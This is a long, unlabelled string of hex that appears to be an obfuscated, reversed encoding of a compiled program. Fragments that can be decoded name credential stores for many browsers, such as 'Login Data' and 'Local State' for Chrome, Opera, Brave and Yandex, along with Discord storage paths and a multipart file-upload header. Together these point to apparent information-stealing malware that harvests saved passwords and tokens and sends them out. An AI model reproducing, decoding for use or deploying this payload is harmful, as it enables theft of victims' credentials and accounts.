120D19121D1E0D1C1D1C1D1E09121C18080808080C120E0A370A5805F2821100260511821C180808080805F18215F18215F182120E01F1821D0709120DF18219F182120DF18219F182120DF18219F182120DF18219F182150D1E0E0E0E0E05F18215F18215F18215F18211F182120E0808080C17093DE281110100260805B18215B1821103000A0511821E050D11B182150D150D19E282150D150D150D1DA1821C1C070C180301002402020E080E0E0E0E08070A020209121D1E0D1C1D1E09121C1108000019121C1C1200060C180100040511821E02020202020E0C120D19121D1E0D1C1D1C1D1C19121D1E0D1C1D1E080C1D1E09121C1C180C1D1C1D1E09121C1E0C19121D1E0D1C1D1C1D1E09121C1E0C120D19121D1E0D1C1D1C1D1E09121C1808080808020C12020B370B5808050D18110400080810002305E2811C11E2811200090818611C611E050D11E2811C611C611E0907021E020202050D1208080E0E0E0072120E0808080117051162821000250511821E020202050D1208080E0E0E0072120E0F07051511821E0852150D150D150D1E050D1E0907021801D28211002605D2821000250E01C2821100260DC2811E0102002705118212020205C2821C19F182150D11C28212050D12050D1E050D1F070D180E080200050302020808080802080D180802080D180D180D180D18080208080D180D1E0E0817012808050D180300270DB2811E010200270E0E0D110005051182120E02020E020E02080202020E02020802020E030E020208080208020E02050D180D41821E0E0162821E080E0D12020C120205118219221809221D1961821E09221D14370749B281150D150D150D13000B050D1E0E030706030E0100040E0C1100240E096182110026020202020D1C1D12020E080E0D10621C1C1201B2821961821E080E0D12096182180961821D1961821D150D150D1E050D1E0D1062110162151062110162151F17004062110DA28115170003110DA2811510002900621101621516020E00621062110DA281151200621101621516070419A2811E01000605A28115B18211020009020202050D18050D1D120202050D18050D1D18050D18050D10170A120202050D120908050D18070C050D12020209050D1818050D1818070C020202050D1209081818070B08050D18020006050D180207050202020202020908050D1C41150D1C41181818150D1017071811010004020202020202020208070A080818050D1104000809121801000502020202020206070808050D110005020201321307060C110100040808110004015115118212081808081902050D11321E0C0703180301000409828210002503020511821201511202020E09070E003212003212020806070A0818120200050032110A04000E100E100E10100E1301001C0D72821D72821D728212000B0032103210321307080151110704097181197181180200090972821E0E09718113000A0511821209718119718114070C020C1C12030006020202020205070702020207040202020E0D1E0E0E050D1E09070D00031D100025000311057282151101002A0E0101621515030D1E0D110026080E0100240E080100240E010162151E0D1E03070A0962821D100026020202096282180962821D120202020A07011511821E0E0E02051182120912821D71821D7182150D150D15128212051182120912821512821202051182155182150D111282120917063952110100250562821107050E0132110025020E01020005020E0808080507070511821E050D120511821209128211328215128212051182155182150D111282120F07032E0162821100060932811D52811D52811103002C0952821142821100080808010200250542811000250552821000250E0E0E0E0E0400070D42821000250942821000250511821142821D32821932811542811142821D3282193281120E0E0E0C070E1003110100250132821105328215180E0E055182110300280D228210002505128211010026092282110100260E08010004052282100025012282110100260D1282110100060808050D11030027020D19121D1E0D1C1D1E09121C1C1700001511821E0E0E02051182120912821D7182150D15128212051182120912821512821202051182155182150D11128212020817023D0282100025050D1E050D1307070C10002309F1821000250E05F18211002602020D19121D1E0D1C1D1E09121C1C180001151182120DF18219F182120D1C1D1E05F1821C11F1821C1B07091E0E0E020025055182110100260E05518211002601E182110100260DE1821101002609E18210000501E1821000050511821E05918215518211E1821E0571821C1807041C1E0E0200050B0000230E0D0D0C14070609D1821000250971811E0100060E0C1207040A0E0100040D0D01000409C1821D10000602020809C1821D1E09C1821A09C1821D1C190703151182150D11B182150D150D1E0DA18219A1821E0907061808050D150D13002801B18210002501C18111010026050D11010025080805B1821805B1821105000C050D150D110026050D11B182150D1DA18219A1821E0E0707011E098182110006098182155182110200290981821000050551821000250191821000250E05A18211000601A1811101000602010100040E0D1E0100050511821E0591821551821191821991821591821551821191821E0D81821E0C0700250D1E0100250511821A097181150D1E0E0E057182180701150D1E0E050D1300280E050D1100250981821000250C1D1E0E0200060581821000250971811000050511821A097181150D1E0E0E0551821571821907041171811C1E01030028020E096182120027096182160409618219618212070808010100040D51821922110007056181110100260E0E0E0E0300060511821107050E0E010024055182150D1100270E0D418211000609418210000508080E0D4182150D1941821E07070E09221000040E09221D11000602020C1307050202020E080E0D19221809221D1E0D1A070118051182110006020E0E080300060E08080808080607080D3182110100260D221D31821207070C1E0100040C1C1C12000509221D100005042211070405218215218211000801221107040121821E010200270121821000250C1C120200050D12120D121307070003110A040003120003110C12151602000312070502000E1207050E0107030912110704080107030C1C110004020107030C110100240511821E0102002705118210002505118211010006000E110A04000E100100150C1C110200250E0D1E0E0200060DF081191211000702000023000E120E0205F082120202000E17070C08121107040412110704011211070408021107040C021107040812110C1215160412110C1215160112110C1215160802110C1215160C02110C12151601F081110100260000047E656D6E6769637371602369637162402C6165737966502C616D627F6E60256375702F647025646F6360276E696C6C616360227F64736166656270256371656C6052400107400002756D69647576684F62705B000100100003746E65635350545E6F69647365647F62705E6554100109100003746E65635350545800010D00000D69445C4C4B6600010B000003705542707C636700010C00000272756D6964707562707C634C0001011000027272756D6964776F6C6273635D000102100003576F6C60505B4700010C00000000000000010805D08111010026000003776E69647475635E297D4B0001001000003E203E293E273138027F647162756E6567456C6966456C676E696353776E69647475635E22756E676963756443776E69647475635E23727F647964654E2F69646574735C61657379665E24766F637F6273696D4B4001095000000000020001080000003E203E203E2731380275646C696572456362757F6375625465607974597C676E6F6274735E237C6F6F645E23756362757F6375625E2D6564737973533001014000000F5F55636E6164737E694F5F55637F60737964431F5F55636E6164737E694F5F556471656273421C6F636F647F6270547E65696C634074747840716F635E237C6F636F647F62705E23756369667275635E2265675E2D6564737973543001016000037D627F664E2473656A6F6270597D4E297D421F5F55636E6164737E694F5F55637F60737964431F5F55636E6164737E694F5F556471656273421D627F664E237D627F664E23777F646E69675E2D6564737973591001085E0E0E0E01040027000003756369667275635265675E297D4E0001031000037D627F664E297D4800010D0000027563755E297D4700010C00000E6F69647163696C6070714E297D4E000103100002756475707D6F634E297D4B0001001000000000010001080DA081110100260000003E203E203E2131380564716C607D6564597D4A0001081E0E0102002504302B627F67756D6162764024554E4E20156D616E49716C607379644B627F67756D616276441E045001003E24367D3E6F69637275665C2B627F67756D61627644554E4E2A1001074000003E203E203E213700010C00000665656735333531393568336D293931693D263939343D236364326D2632343234663532342001092201010024000001323032302029A2C0247867696279707F634210010710000000010500000646595551464654575647445579766774776665797653474746495B1001002000000001070001080571110100250103777F6278645E6F696470756368754E6F6E40716277561204500100010E10000000000800010808B081160400B081160404B0811604081811000402000003090201000409081100040800A0811010A081101803002C094210A0811010A081101803002D0C1D421800A0811010A0811019421500201801321818180400280942180100250C1D421801321818194216002C0E0A0100240C1D421E094213002809421A0100250C1D4219421200270800A0811010A081101803000C0E0A01000408120100040A0000030E08100E120100170E08181200050E0811000408110162151606080008230E0D1008240880821D1008260A00082308010100240E0D110100250880821D110100270880821D1000260A010100240A0000230880821D16050E0D1000240E080E02002508080E0200250E020100240B020100240B0101002408080B0200250A0201002408080A02002508080100240E0D160308711D16040C711D16040B06020706020000000204000000010404611603000E100E10100E1201001A0E000003050D150D1C1200070C611018086110181C61101E0C611012070002150D150D1E0200070E050D1100050E020100040E080E020005050D1E010005006211016215100008050D1D150D1100270E08150D1200260810150D18181300280E0E0E081300260818010024050D150D150D150D150D150D15002E0E01010024050D150D150D110300290A0602080E0102002508080018050D18050D1C411018050D18190A000319080018050D18050D1C411018050D18190A000318190100040908050D180818101E08181909000E0808050D1E081905000909080018050D1E081906000B090819020005090E0E081019040008080602050D160300000004040000000804000000000409060209521603004216030942115110180200280C1D421151101808094215002C090E01002401511E01002501511018080803002800321101002508180100040151101808081804000908081C321808140008003216030206020816020C3216030E000823015110082401511000240E0151110200260151160304321C110200260942110100250C1D4214321C194214002A081C110200250D221008040001020E0E0200050E0012010005090909020005050D1201000505110819080132150D19090807000C0808010004080018180200060808001808180400080801321818030007081000030E0101000404321C1102000601421C11020006050D1000040C1000030E0E0E0200050E0E0E010300060E0E0E050D110400080E0E0E0E010400070E0E0102000506110A0E0E0803000609080100040221080E0018080300070E0E0100040E0C1100040D31193215321C1204000A0D22110100050D221000040C160201321603083216030D22160309221D16040E0602042210080404221000040422160301221008040D1210080401221101000501221000040D12100004012216030D12160300031008240003100024000316030E0000230912100024080000230C12010024000E101101010037000E100E110100170512160308121008040412100804011210080408021008040C0210080408121000040412100004011210000408021000040C02100004010000030812110C121516070412110C121516070112110C121516070802110C121516070C02110C121516070980E439165C5A77B8010000230A3A05D11F7F5F30B80004CD9606E8E4C155A8462D4E5BEEE83A7000000004700070097002700360056004400F50025004400350013001300B40005F1000047009600E6009400F50035003500E4110000C600C6004600E200330037003700E600C5310000C600C6004600E20056005700C6007600A700F600D600C5910000C5008700F600260047003700F6000500C5310000C5002700560037007700F60027002400D6009600C6003500C5B10000C5004700E6005600270027005700340002008700F600660027005600470016007500C5520000C500E600F600F600D40002005600C60016000500C5710000C5008700F600660027005600260097003400C5510000C500E600F6007600160027004400560036009400C500F6004600F600D600F6003400C5520000C50097005600B600E600F600D400160056003500C5710000C5008700F6006600560027009600640002001600C600C6009600A700F600D400C5320000C5004600270096002600270056004600E60057008600450002001600C600C6009600A700F600D400C5B2000035005400C40094006400D400140025007400F400250005910000E6007700F60046004700570086003500F50035003500E49110000200A30047003700F6008400A000D000E600F600F600D4005600C600160005000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000037005600C60096006600F60027000500C500E600F600F600D40002005600C60016000500C5003700E600F60096004700360057004600F6002700050002004600C600960086003600E600F600F600D41510000200A30047003700F6008400A000D0008700F600240047003700F60005000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000037005600C60096006600F60027000500C5000700070014008700F600260047003700F600057210000200A30047003700F6008400A000D000D6009600C60035000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000037005600C60096006600F60027000500C5002700560037007700F60027002400D6009600C6003500C500B600160056000500860037001600C60064D310000200A30047003700F6008400A000D0008700F6006400270056002600970034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000037005600C60096006600F60027000500C5008700F600660027005600260097003400C5003700F60096004600570047003700870036005600070083D310000200A30047003700F6008400A000D000E600F600760016002700440002005600360094000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D03808000037005600C60096006600F60027000500C500E600F6007600160027004400560036009400C500F6004600F600D600F600343310000200A30047003700F6008400A000D00097005600B600E600F600D4001600560035000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D01808000037005600C60096006600F60027000500C50097005600B600E600F600D400160056003500C5001600C600C6009600A700F600D45310000200A30047003700F6008400A000D0004600270096002600270056004600E6005700860045000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D058080000C50037005600C60096006600F60027000500C5004600270096002600270056004600E6005700860045B210000200A30047003700F6008400A000D0008700F6006400270056004700160075000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000037005600C60096006600F60027000500C5008700F60066002700560047001600753210000200A30047003700F6008400A000D0008700F600660056002700960064000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D70000E600F6003700A600E2003700E60096007600F600C671000037005600C60096006600F60027000500C5008700F60066005600270096006400C5001600C600C6009600A700F600D41300005600C6002600160047B000005400550015009400E40055D00000823010000200A000D000D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200A000D000A000D01510000200A300E6005600B600F6004500A000D00046002700F60036003700960044000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F700001400F200E47000007600F600C600E2900000C50026004600C600560067005600C600C5005600760016002700F600470035000200C60016003600F600C400C50046002700F6003600370096004600C5F30000B6002700F600770047005600E4000200E60056000700F49100009200A200E200E30027005600470066001600C300F30082000200A3000200A20002004700E60056004700E600F6003400020097005600B49300005600C60096006600F6002700070002007700F600860037000200E6001600C600773200008600370047005600E6B00000270016005600C6003600D30097005600B6000200227100002200D3005600D6001600E60002005600C60096006600F6002700070002007700F600860037000200E6001600C6007713000002000200A30046002700F60077003700370016000500A000D0B100000200A3005600D6001600E400020096006400960075710000A000D0009600660096007500020046005600470036005600E600E600F60034000200A300D600F6002700640002004600E6005700F60064931000A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0740000D7004300B700D7003300B700D7002300B700D7001300B700D7000300B7F10000270056004700660016B000009200A200E200E30027005600470066001600C300F30082000200A3000200A20002005600C60096006600F60027000500020027005600370055000200C600C60014341000D2300000930083007300630043003300230095008500750065004500250015000500D400B400A4008400740064004400340024130000440094004700360057004600F60027000500C6001600470096007600960044120000E600F600960037002700560065004700E60056002700270057003400C5004500E400020037007700F6004600E60096007500C50047006600F6003700F600270036009600D400C500560027001600770047006600F600359510000200A30047003700F6008400A000D000470037001600670014000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F60027002400C500560027001600770047006600F6003500020045003500140065001400C59610000200A30047003700F6008400A000D000F6001600260056009600C4000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000003002600F600C60026B00000230027004700379000003300270047003790000037005600960027004700E60056F000005600760016002700F600470035004600560047000700970027003600E6005400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5007300F6001600260056009600C400C57510000200A300C600F6003600F6004700F60027000500A000D000E600960076004600960005000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D03808000046002700F6007700370037001600071100005600D6001600E6900000C600F6003600F6004700F600270007110000C600D6008700E20037004700E6005700F600360036001600C5005600C6000700270057000700E200C5B2000016004700160044000700070014F01000A000D000D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200D200A000D0B400000200A30047002700F6000500A000D01100000200A30046002700F60077003700370016000500A000D09100000200A3005600D6001600E6002700560037005500A000D09100000200A30047003700F60084D01000A000D0001600C600C6009600A5005600C600960064000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D057000047002700F600059000003700370016000590000047003700F60084900000C600D6008700E20037002700560067002700560037004700E6005600360056002700C5001600C600C6009600A5005600C60096006400C5931000D300B200F300F200E300C300C200A300B3007200C700C500D700D500B700B50092008200A2006200E50052004200320004001200E700E200D200F5000300930083007300630053004300330023001300A7009700870077006700570047003700270017000700F600E600D600C600B600A6009600860076006600560046003600260016580810000200A30047003700F6008400A000D0001600270056000700F4000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000007001600370037007700F60027004600F50067001600C600570056D100005700370056002700E6001600D6005600F50067001600C600570056D10000F6002700960076009600E600F50057002700C651000056005700C6001600650047005600741100004700E6005700F60034007700F60025004700560074710000C600F60076009600E60037D000005600C60026001600450046001600560025310000C500F4000700560027001600C500F4000700560027001600C50007002700F60066009600C6005600C50077001600E6004600E2004600160047B30000C500F400070056002700160002003500F600660047007700160027005600C500F400070056002700160002003500470016002600C6005600C500C400F60076009600E600020044001600470016F410000200A30047003700F6008400A000D000D60057009600D600F600270086003400020056007600460054000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D09808000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5005600760046005400C50047006600F6003700F600270036009600D400C59510000200A30047003700F6008400A000D000D600F600070085000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D600F60007008500C55410000200A30047003700F6008400A000D000160047005600D600F600B4000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500160047005600D600F600B400C59410000200A30047003700F6008400A000D000F60076009600D60014000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500F60076009600D6001400C57410000200A30047003700F6008400A000D0005600D600F6002700860036009600E4000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5005600D600F6002700860036009600E400C5D410000200A30047003700F6008400A000D00036009600070054000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F600270024000200970036001600670096002700050002003600960007005400C55610000200A30047003700F6008400A000D000B60037009600C60024000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500B60037009600C6002400C57410000200A30047003700F6008400A000D000340055000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D03700003700E60096007600F600C600F5007700F6007751000083001300E20016004700160044000200E60096007600F600C400020034005500C5004700C60057001600660056004400C500E600830013009600F500160047001600440002002700560037005500C5002700560037007700F6002700240034005500C55610000200A30047003700F6008400A000D000860036002700F60045000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500860036002700F6004500C57410000200A30047003700F6008400A000D000560067001600270024000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097100016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F60027002400D20056006700160027002400C500560027001600770047006600F600350056006700160027002400C53710000200A30047003700F6008400A000D000F6004600F600D600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500E600F6007600160027004400C500F6004600F600D600F6003400C575000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5005600D600F600270086003400C5005600D600F600270086003400030063003300C5D510000200A30047003700F6008400A000D0000300630033000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D057000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F60027002400C5002700560037007700F60027002400030063003300C51610000200A30047003700F6008400A000D0004600270096002600270056000700570035000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D01808000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500460027009600240027005600070057003500C5F410000200A30047003700F6008400A000D0004700F60046005600860034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5004700F6004600560086003400C59410000200A30047003700F6008400A000D000470037001600650087000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50047003700160067008500C57410000200A30047003700F6008400A000D0004700E600560034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F600270024004700E60056003400C53510000200A30047003700F6008400A000D00047003700F600860074000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F6002700240047003700F60086007400C55510000200A30047003700F6008400A000D000D60057009600D600F6002700860034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F710000200A30047003700F6008400A000D000E600F600270094000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D60057009600D600F600270086003400C5D410000200A30047003700F6008400A000D00096004600C60016006700960065000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50096004600C6001600670096006500C5B410000200A30047003700F6008400A000D000D6005700960046009600270094000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D600570096004600960027009400C5B410000200A30047003700F6008400A000D00047005600A600D6009600C60035000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50047005600A600D6009600C6003500C5B410000200A30047003700F6008400A000D000D60057004700960026002700F4000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500D60057004700960026002700F400C5B410000200A30047003700F6008400A000D000150015000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D037000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F6002700240015001500C5004700E60056003600E60056004500C5F510000200A30047003700F6008400A000D000E6001600270055000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D077000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500E600160027005500C5001600960046005600D400A700F60034005700C59510000200A30047003700F6008400A000D0003600F60034003600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5002700560037007700F60027002400C5003600F60034003600F6003400C59510000200A30047003700F6008400A000D000E600F6007700F600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500E600F6007700F600F6003400C500E600F6007700F600F6003400C57510000200A30047003700F6008400A000D0005600D600F60027008600340002005600C6007600F600F60074000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D09808000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C5005600D600F600270086003400C5005600C6007600F600F6007400C57510000200A30047003700F6008400A000D000970027001600E6001600340002005600D600F6002700860034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D09808000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50035008700350002005600D600F600270086003400C5005600C6007600F600F6007400C5F510000200A30047003700F6008400A000D000F600960027004700960034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500F60096002700470096003400C50007005700F600270074001600E6009600C6001600470016003400C55610000200A30047003700F6008400A000D00027009600E600070096005600C60035000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500270056007700560096006500D60057009600D600F600270086003400C50037005600C60057004600F600D600C5007600E60096004700470056003700C500530027009600E600070096005600C6003500C5003600E60094000200270096002700E60056006400C5F808000014004500140044000500050014F010000200A30047003700F6008400A000D000270016004700350073000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D097000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50027001600470035007300C50027001600470035007300C53510000200A30047003700F6008400A000D000B6007700160084000200B60036001600C60024000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D03808000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500B600770016008400B60036001600C6002400C5F410000200A30047003700F6008400A000D000660027005700350002000500940015000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50066002700570035000200050094001500C5D410000200A30047003700F6008400A000D000F6006700F600E400C600F600F60034000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0F7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C50037005700C60005005600D600F600270086003400C500F600960046005700470035005600C60007001600D400C59610000200A30047003700F6008400A000D000E600F600B600C600160064000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0B710000200A30047003700F6008400A000D000B6009600E60047005700070035000200A300D600F6002700640002004600E6005700F6006400A000D000D200D200D200D200D200D200D200D200020027005600B600360016002700450002005600B6001600E60035000200D200D200D200D200D200D200D200D200A000D0D7000016004700160044000200E60096007600F600C400C5004700C60057001600660056004400C500160047001600440002002700560037005500C500B6009600E6004700570007003500C500B6009600E6004700570007003500C5B500000200A300250035005500A000D0F010000200A30047003700F6008400A000D0001600A700E6009600B4000200A300D600F6002700640002004600E